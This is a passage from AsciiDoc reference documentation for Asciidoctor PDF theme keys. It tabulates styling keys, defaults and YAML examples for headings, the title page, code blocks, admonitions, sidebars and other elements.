12)\n|base:\n font_size: 10.5\n\n\/\/ font_size_large is a variable, not an official key\n\/\/|font_size_large\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font_size_large: 13\n\n|font_size_min\n|<<values,Number>> +\n(default: 9)\n|base:\n font_size_min: 6\n\n\/\/ font_size_small is a variable, not an official key\n\/\/|font_size_small\n\/\/|<<values,Number>>\n\/\/|base:\n\/\/ font_size_small: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: normal)\n|base:\n font_style: normal\n\n|text_transform^[1]^\n|none +\n(default: none)\n|base:\n text_transform: none\n\n|line_height_length^[2]^\n|<<values,Number>> +\n(default: 13.8)\n|base:\n line_height_length: 12\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|base:\n line_height: >\n $base_line_height_length \/\n $base_font_size\n|===\n\n. The `text_transform` key cannot be set globally.\nTherefore, this key should not be used.\nThe value of `none` is implicit and is documented here for completeness.\n. You should set one of `line_height` or `line_height_length`, then derive the value of the other using a calculation as these are correlated values.\nFor instance, if you set `line_height_length`, then use `$base_line_height_length \/ $base_font_size` as the value of `line_height`.\n\n[#keys-vertical-spacing]\n=== Vertical Spacing\n\nThe keys in this category control the general spacing between elements where a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n|vertical_spacing\n|<<values,Number>> +\n(default: 12)\n|vertical_spacing: 10\n|===\n\n[#keys-link]\n=== Link\n\nThe keys in this category are used to style hyperlink text.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-link]*Key Prefix:* <<key-prefix-link,link>>\n\n|font_color\n|<<colors,Color>> +\n(default: #0000ee)\n|link:\n font_color: #428bca\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|link:\n font_family: Roboto\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|link:\n font_size: 9\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|link:\n font_style: italic\n\n|text_decoration\n|none {vbar} underline {vbar} line-through +\n(default: none)\n|link:\n text_decoration: underline\n|===\n\n[#keys-literal]\n=== (Inline) Literal\n\nThe keys in this category are used for inline monospaced text in prose and table cells.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-literal]*Key Prefix:* <<key-prefix-literal,literal>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|literal:\n font_color: #b12146\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|literal:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|literal:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|literal:\n font_style: bold\n|===\n\n[#keys-heading]\n=== Heading\n\nThe keys in this category control the style of most headings, including part titles, chapter titles, sections titles, the table of contents title and discrete headings.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-heading]*Key Prefix:* <<key-prefix-heading,heading>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $base_align)\n|heading:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|heading:\n font_color: #222222\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|heading:\n font_family: Noto Serif\n\n\/\/ NOTE: heading_font_size is overridden by h<n>_font_size in base theme\n\/\/|font_size\n\/\/|<<values,Number>> +\n\/\/(default: $base_font_size)\n\/\/|heading:\n\/\/ font_size: 18\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|heading:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|heading:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.15)\n|heading:\n line_height: 1.2\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 4)\n|heading:\n margin_top: $vertical_spacing * 0.2\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|heading:\n margin_bottom: 9.6\n\n3+|[#key-prefix-heading-level]*Key Prefix:* <<key-prefix-heading-level,heading_h<n> >>^[1]^\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: $heading_align)\n|heading:\n h2_align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $heading_font_color)\n|heading:\n h2_font_color: [0, 99%, 100%, 0]\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $heading_font_family)\n|heading:\n h4_font_family: Roboto\n\n|font_size^[1]^\n|<<values,Number>> +\n(default: <1>=24; <2>=18; <3>=16; <4>=14; <5>=12; <6>=10)\n|heading:\n h6_font_size: $base_font_size * 1.7\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $heading_font_style)\n|heading:\n h3_font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $heading_text_transform)\n|heading:\n text_transform: lowercase\n|===\n\n. `<n>` is a number ranging from 1 to 6, representing each of the six heading levels.\n. A font size is assigned to each heading level by the base theme.\nIf you want the font size of a specific level to be inherited, you must assign the value `null` (or `~` for short).\n\n[#keys-title-page]\n=== Title Page\n\nThe keys in this category control the style of the title page as well as the arrangement and style of the elements on it.\n\nTIP: The title page can be disabled from the document by setting the `notitle` attribute in the AsciiDoc document header.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-title-page]*Key Prefix:* <<key-prefix-title-page,title_page>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|title_page:\n align: right\n\n|background_color^[1]^\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n background_color: #eaeaea\n\n|background_image^[1]^\n|Inline image macro^[2]^ +\n(default: _not set_)\n|title_page:\n background_image: image:title.png[]\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.15)\n|title_page:\n line_height: 1\n\n3+|[#key-prefix-title-page-logo]*Key Prefix:* <<key-prefix-title-page-logo,title_page_logo>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: _inherit_)\n|title_page:\n logo:\n align: right\n\n|image\n|Inline image macro^[2]^ +\n(default: _not set_)\n|title_page:\n logo:\n image: image:logo.png[pdfwidth=25%]\n\n|top\n|Percentage^[3]^ +\n(default: 10%)\n|title_page:\n logo:\n top: 25%\n\n3+|[#key-prefix-title-page-title]*Key Prefix:* <<key-prefix-title-page-title,title_page_title>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n title:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 18)\n|title_page:\n title:\n font_size: $heading_h1_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n title:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n title:\n line_height: 0.9\n\n|top\n|Percentage^[3]^ +\n(default: 40%)\n|title_page:\n title:\n top: 55%\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n title:\n margin_bottom: 5\n\n3+|[#key-prefix-title-page-subtitle]*Key Prefix:* <<key-prefix-title-page-subtitle,title_page_subtitle>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: 14)\n|title_page:\n subtitle:\n font_size: $heading_h3_font_size\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n subtitle:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: $heading_line_height)\n|title_page:\n subtitle:\n line_height: 1\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n subtitle:\n margin_bottom: 5\n\n3+|[#key-prefix-authors]*Key Prefix:* <<key-prefix-authors,title_page_authors>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n authors:\n delimiter: '; '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n authors:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n authors:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 12)\n|title_page:\n authors:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n authors:\n margin_bottom: 5\n\n3+|[#key-prefix-revision]*Key Prefix:* <<key-prefix-revision,title_page_revision>>\n\n|delimiter\n|<<quoted-string,Quoted string>> +\n(default: ', ')\n|title_page:\n revision:\n delimiter: ': '\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_color: #181818\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_size: $base_font_size_small\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|title_page:\n revision:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|title_page:\n revision:\n text_transform: uppercase\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_top: 13.125\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 0)\n|title_page:\n revision:\n margin_bottom: 5\n|===\n\n. Page background images are automatically scaled to fit within the bounds of the page.\n+\nNOTE: Page backgrounds do not currently work when using AsciidoctorJ PDF.\nThis limitation is due to a bug in Prawn 1.3.1.\nThe limitation will remain until AsciidoctorJ PDF upgrades to Prawn 2.x (an upgrade that is waiting on AsciidoctorJ to migrate to JRuby 9000).\nFor more details, see http:\/\/discuss.asciidoctor.org\/Asciidoctor-YAML-style-file-for-PDF-and-maven-td3849.html[this thread].\n. Target may be an absolute path or a path relative to the value of the `pdf-stylesdir` attribute.\n. Percentage unit can be % (relative to content height) or vh (relative to page height).\n\n[#keys-prose]\n=== Prose\n\nThe keys in this category control the spacing around paragraphs (paragraph blocks, paragraph content of a block, and other prose content).\nTypically, all the margin is placed on the bottom.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-prose]*Key Prefix:* <<key-prefix-prose,prose>>\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|prose:\n margin_top: 0\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|prose:\n margin_bottom: $vertical_spacing\n|===\n\n[#keys-block]\n=== Block\n\nThe keys in this category control the spacing around block elements when a more specific setting is not designated.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-block]*Key Prefix:* <<key-prefix-block,block>>\n\n\/\/|padding\n\/\/|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>>\n\/\/|block:\n\/\/ padding: [12, 15, 12, 15]\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|block:\n margin_top: 6\n\n|margin_bottom\n|<<measurement-units,Measurement>> +\n(default: 12)\n|block:\n margin_bottom: 6\n|===\n\nBlock styles are applied to the following block types:\n\n[cols=\"3*a\",grid=none,frame=none]\n|===\n|\n* admonition\n* example\n* quote\n|\n* verse\n* sidebar\n* image\n|\n* listing\n* literal\n* table\n|===\n\n[#keys-caption]\n=== Caption\n\nThe keys in this category control the arrangement and style of block captions.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-caption]*Key Prefix:* <<key-prefix-caption,caption>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: left)\n|caption:\n align: left\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|caption:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|caption:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|caption:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: italic)\n|caption:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|caption:\n text_transform: uppercase\n\n|margin_inside\n|<<measurement-units,Measurement>> +\n(default: 4)\n|caption:\n margin_inside: 3\n\n|margin_outside\n|<<measurement-units,Measurement>> +\n(default: 0)\n|caption:\n margin_outside: 0\n|===\n\n[#keys-code]\n=== Code\n\nThe keys in this category are used to control the style of literal, listing and source blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-code]*Key Prefix:* <<key-prefix-code,code>>\n\n|background_color\n|<<colors,Color>> +\n(default: _not set_)\n|code:\n background_color: #f5f5f5\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|code:\n border_color: #cccccc\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|code:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|code:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|code:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: Courier)\n|code:\n font_family: M+ 1mn\n\n|font_size\n|<<values,Number>> +\n(default: 10.5)\n|code:\n font_size: 11\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|code:\n font_style: italic\n\n|line_height\n|<<values,Number>> +\n(default: 1.2)\n|code:\n line_height: 1.25\n\n|line_gap^[1]^\n|<<values,Number>> +\n(default: 0)\n|code:\n line_gap: 3.8\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 9)\n|code:\n padding: 11\n\n3+|[#key-prefix-table-cell]*Key Prefix:* <<key-prefix-code-linenum,code_linenum>>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: #999999)\n|code:\n linenum_font_color: #ccc\n|===\n. The line_gap is used to tune the height of the background color applied to a span of block text highlighted using Rouge.\n. The code_linenum category only applies when using Pygments as the source highlighter.\nOtherwise, the style is controlled by the source highlighter theme.\n\n[#keys-callout-numbers]\n=== Callout Numbers\n\nThe keys in this category are used to control the style of callout numbers (conums) inside verbatim blocks and in callout lists (colists).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-conum]*Key Prefix:* <<key-prefix-conum,conum>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|conum:\n font_color: #b12146\n\n|font_family^[1,2]^\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|conum:\n font_family: M+ 1mn\n\n|font_size^[2]^\n|<<values,Number>> +\n(default: _inherit_)\n|conum:\n font_size: $base_font_size\n\n|font_style^[2]^\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|conum:\n font_style: normal\n\n|line_height^[2]^\n|<<values,Number>> +\n(default: 1.15)\n|conum:\n line_height: 4 \/ 3\n|===\n\n. Currently, the font must contain the circle numbers starting at glyph U+2460.\n. font_family, font_size, font_style, and line_height are only used for markers in a colist.\nThese properties are inherited for conums inside a verbatim block.\n\n[#keys-menu]\n=== Menu\n\nThe keys in this category apply to the menu label (generated from the inline menu macro).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-menu]*Key Prefix:* <<key-prefix-menu,menu>>\n\n|caret_content\n|<<quoted-string,Quoted string>> +\n(default: \" \\u203a \")\n|menu:\n caret_content: ' > '\n|===\n\n[#keys-blockquote]\n=== Blockquote\n\nThe keys in this category control the arrangement and style of quote blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-blockquote]*Key Prefix:* <<key-prefix-blockquote,blockquote>>\n\n|border_width^[1]^\n|<<values,Number>> +\n(default: 4)\n|blockquote:\n border_width: 5\n\n|border_color^[1]^\n|<<colors,Color>> +\n(default: #eeeeee)\n|blockquote:\n border_color: #eeeeee\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [6, 12, -6, 14])\n|blockquote:\n padding: [5, 10, -5, 12]\n\n3+|[#key-prefix-blockquote-cite]*Key Prefix:* <<key-prefix-blockquote-cite,blockquote_cite>>\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_size: 9\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_family: Noto Serif\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|blockquote:\n cite:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|blockquote:\n cite:\n text_transform: uppercase\n|===\n\n. Only applies to the left side.\n\n[#keys-sidebar]\n=== Sidebar\n\nThe keys in this category control the arrangement and style of sidebar blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-sidebar]*Key Prefix:* <<key-prefix-sidebar,sidebar>>\n\n|background_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|sidebar:\n background_color: #eeeeee\n\n|border_color\n|<<colors,Color>> +\n(default: _not set_)\n|sidebar:\n border_color: #ffffff\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: _not set_)\n|sidebar:\n border_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|sidebar:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|sidebar:\n padding: [12, 15, 0, 15]\n\n3+|[#key-prefix-sidebar-title]*Key Prefix:* <<key-prefix-sidebar-title,sidebar_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|sidebar:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|sidebar:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|sidebar:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|sidebar:\n title:\n text_transform: uppercase\n|===\n\n[#keys-example]\n=== Example\n\nThe keys in this category control the arrangement and style of example blocks.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-example]*Key Prefix:* <<key-prefix-example,example>>\n\n|background_color\n|<<colors,Color>> +\n(default: #ffffff)\n|example:\n background_color: #fffef7\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|example:\n border_color: #eeeeee\n\n|border_radius\n|<<values,Number>> +\n(default: _not set_)\n|example:\n border_radius: 4\n\n|border_width\n|<<values,Number>> +\n(default: 0.5)\n|example:\n border_width: 0.75\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|example:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|example:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|example:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|example:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|example:\n text_transform: uppercase\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [12, 12, 0, 12])\n|example:\n padding: [15, 15, 0, 15]\n|===\n\n[#keys-admonition]\n=== Admonition\n\nThe keys in this category control the arrangement and style of admonition blocks and the icon used for each admonition type.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-admonition]*Key Prefix:* <<key-prefix-admonition,admonition>>\n\n|column_rule_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|admonition:\n column_rule_color: #aa0000\n\n|column_rule_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|admonition:\n column_rule_style: double\n\n|column_rule_width\n|<<values,Number>> +\n(default: 0.5)\n|admonition:\n column_rule_width: 0.5\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n font_color: #999999\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n font_family: Noto Sans\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n font_size: $base_font_size_large\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|admonition:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|admonition:\n text_transform: none\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: [0, 12, 0, 12])\n|admonition:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-admonition-label]*Key Prefix:* <<key-prefix-admonition-label,admonition_label>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|admonition:\n label:\n align: center\n\n|min_width\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|admonition:\n label:\n min_width: 48\n\n|padding^[1]^\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: $admonition_padding)\n|admonition:\n padding: [0, 12, 0, 12]\n\n|vertical_align\n|top {vbar} middle {vbar} bottom +\n(default: middle)\n|admonition:\n label:\n vertical_align: top\n\n3+|*Key Prefix:* admonition_label, admonition_label_<name>^[2]^\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|admonition:\n label:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|admonition:\n label:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: _inherit_)\n|admonition:\n label:\n font_size: 12\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|admonition:\n label:\n font_style: bold_italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: uppercase)\n|admonition:\n label:\n text_transform: lowercase\n\n3+|[#key-prefix-admonition-icon]*Key Prefix:* <<key-prefix-admonition-icon,admonition_icon_<name> >>^[2]^\n\n|name\n|<icon set>-<icon name>^[3]^ +\n(default: _not set_)\n|admonition:\n icon:\n tip:\n name: fa-fire\n\n|stroke_color\n|<<colors,Color>> +\n(default: caution=#bf3400; important=#bf0000; note=#19407c; tip=#111111; warning=#bf6900)\n|admonition:\n icon:\n important:\n stroke_color: ff0000\n\n|size\n|<<values,Number>> +\n(default: 24)\n|admonition:\n icon:\n note:\n size: 24\n|===\n\n. The top and bottom padding values are ignored on admonition_label_padding.\n. `<name>` can be `note`, `tip`, `warning`, `important`, or `caution`.\nThe subkeys in the icon category cannot be flattened (e.g., `tip_name: fa-lightbulb-o` is not valid syntax).\n. Required.\nSee the `.yml` files in the https:\/\/github.com\/jessedoyle\/prawn-icon\/tree\/master\/data\/fonts[prawn-icon repository] for a list of valid icon names.\nThe prefix (e.g., `fa-`) determines which font set to use.\n\n[#keys-image]\n=== Image\n\nThe keys in this category control the arrangement of block images.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-image]*Key Prefix:* <<key-prefix-image,image>>\n\n|align\n|<<image-alignments,Image alignment>> +\n(default: left)\n|image:\n align: left\n\n|width^[1]^\n|<<measurement-units,Measurement>> +\n(default: _not set_)\n|image:\n width: 100%\n|===\n\n. Only applies to block images.\nIf specified, this value takes precedence over the value of the `width` attribute on the image macro, but not over the value of the `pdfwidth` attribute.\n\n[#keys-lead]\n=== Lead\n\nThe keys in this category control the styling of lead paragraphs.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-lead]*Key Prefix:* <<key-prefix-lead,lead>>\n\n|font_color\n|<<colors,Color>> +\n(default: _inherit_)\n|lead:\n font_color: #262626\n\n|font_family\n|<<fonts,Font family name>> +\n(default: _inherit_)\n|lead:\n font_family: M+ 1p\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|lead:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: _inherit_)\n|lead:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: _inherit_)\n|lead:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|lead:\n line_height: 1.4\n|===\n\n[#keys-abstract]\n=== Abstract\n\nThe keys in this category control the arrangement and style of the abstract.\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-abstract]*Key Prefix:* <<key-prefix-abstract,abstract>>\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n font_color: #5c6266\n\n|font_size\n|<<values,Number>> +\n(default: 13.5)\n|abstract:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: $base_font_style)\n|abstract:\n font_style: italic\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n text_transform: uppercase\n\n|line_height\n|<<values,Number>> +\n(default: 1.4)\n|abstract:\n line_height: 1.4\n\n|padding\n|<<measurement-units,Measurement>> {vbar} <<measurement-units,Measurement[top,right,bottom,left]>> +\n(default: 0)\n|abstract:\n padding: [0, 12, 0, 12]\n\n3+|[#key-prefix-abstract-title]*Key Prefix:* <<key-prefix-abstract-title,abstract_title>>\n\n|align\n|<<text-alignments,Text alignment>> +\n(default: center)\n|abstract:\n title:\n align: center\n\n|font_color\n|<<colors,Color>> +\n(default: $base_font_color)\n|abstract:\n title:\n font_color: #333333\n\n|font_family\n|<<fonts,Font family name>> +\n(default: $base_font_family)\n|abstract:\n title:\n font_family: Noto Serif\n\n|font_size\n|<<values,Number>> +\n(default: $base_font_size)\n|abstract:\n title:\n font_size: 13\n\n|font_style\n|<<font-styles,Font style>> +\n(default: bold)\n|abstract:\n title:\n font_style: bold\n\n|text_transform\n|<<text-transforms,Text transform>> +\n(default: $base_text_transform)\n|abstract:\n title:\n text_transform: uppercase\n|===\n\n[#keys-thematic-break]\n=== Thematic Break\n\nThe keys in this category control the style of thematic breaks (aka horizontal rules).\n\n[cols=\"3,4,5l\"]\n|===\n|Key |Value Type |Example\n\n3+|[#key-prefix-thematic-break]*Key Prefix:* <<key-prefix-thematic-break,thematic_break>>\n\n|border_color\n|<<colors,Color>> +\n(default: #eeeeee)\n|thematic_break:\n border_color: #eeeeee\n\n|border_style\n|solid {vbar} double {vbar} dashed {vbar} dotted +\n(default: solid)\n|thematic_break:\n border_style: dashed\n\n|border_width\n|<<measurement-units,Measurement>> +\n(default: 0.5)\n|thematic_break:\n border_width: 0.5\n\n|margin_top\n|<<measurement-units,Measurement>> +\n(default: 0)\n|thematic_break:\n margin_top: 